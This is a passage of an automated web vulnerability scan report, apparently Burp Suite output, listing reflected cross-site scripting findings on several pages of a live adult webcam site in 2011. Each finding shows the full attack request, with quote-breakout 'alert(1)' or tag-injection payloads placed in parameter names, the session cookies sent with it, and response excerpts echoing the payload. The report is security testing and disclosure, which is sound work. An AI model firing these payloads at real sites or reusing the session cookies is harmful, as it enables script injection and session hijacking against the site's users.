Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:28 GMT
Connection: close
Content-Length: 25736
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/snapshotgallery.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-photos/?71e01'-alert(1)-'ba036a24c83=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

4.541. http://imlive.com/live-sex-chats/sex-show-photos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/live-sex-chats/sex-show-photos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36a69"><a>8ff796eb34d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/sex-show-photos/?36a69"><a>8ff796eb34d=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:18 GMT
Connection: close
Content-Length: 25588
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/sex-show-photos/?36a69"><a>8ff796eb34d=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.542. http://imlive.com/live-sex-chats/sex-show-sessions/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/sex-show-sessions/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45e02'-alert(1)-'fb52648c8dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /live-sex-chats/sex-show-sessions/?45e02'-alert(1)-'fb52648c8dd=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:37 GMT
Connection: close
Content-Length: 26074
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/recordedlivesessions.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-sessions/?45e02'-alert(1)-'fb52648c8dd=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

4.543. http://imlive.com/live-sex-chats/sex-show-sessions/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/live-sex-chats/sex-show-sessions/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dabb"><a>3c523209842 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/sex-show-sessions/?1dabb"><a>3c523209842=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:07 GMT
Connection: close
Content-Length: 25926
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/sex-show-sessions/?1dabb"><a>3c523209842=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.544. http://imlive.com/live-sex-chats/sex-video-features/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/live-sex-chats/sex-video-features/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2028a"><a>c334382ea0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/sex-video-features/?2028a"><a>c334382ea0e=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:29 GMT
Connection: close
Content-Length: 32222
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/sex-video-features/?2028a"><a>c334382ea0e=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.545. http://imlive.com/live-sex-chats/sex-video-features/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/sex-video-features/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80442'-alert(1)-'ebd4ed614b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /live-sex-chats/sex-video-features/?80442'-alert(1)-'ebd4ed614b9=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:37 GMT
Connection: close
Content-Length: 32369
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hotfeatures.aspx&he=imlive.com&ul=/live-sex-chats/sex-video-features/?80442'-alert(1)-'ebd4ed614b9=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

4.546. http://imlive.com/live-sex-chats/shemale-couple/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/live-sex-chats/shemale-couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52e5c"><a>069e897b555 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/shemale-couple/?52e5c"><a>069e897b555=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

4.547. http://imlive.com/live-sex-chats/shemale-couple/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/shemale-couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f758'-alert(1)-'be71a5fa912 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /live-sex-chats/shemale-couple/?9f758'-alert(1)-'be71a5fa912=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:06 GMT
Connection: close
Content-Length: 92716
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shemale-couple/?9f758'-alert(1)-'be71a5fa912=1&qs=cat=1^roomid=557^9f758'-alert(1)-'be71a5fa912=1&qs=cat=1^roomid=557^9f758'-alert(1)-'be71a5fa912=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63
...[SNIP]...

4.548. http://imlive.com/live-sex-chats/shemale/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/shemale/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7464'-alert(1)-'af09ad182b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /live-sex-chats/shemale/?b7464'-alert(1)-'af09ad182b3=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:31 GMT
Connection: close
Content-Length: 224765
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shemale/?b7464'-alert(1)-'af09ad182b3=1&qs=cat=1^roomid=51^b7464'-alert(1)-'af09ad182b3=1&qs=cat=1^roomid=51^b7464'-alert(1)-'af09ad182b3=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

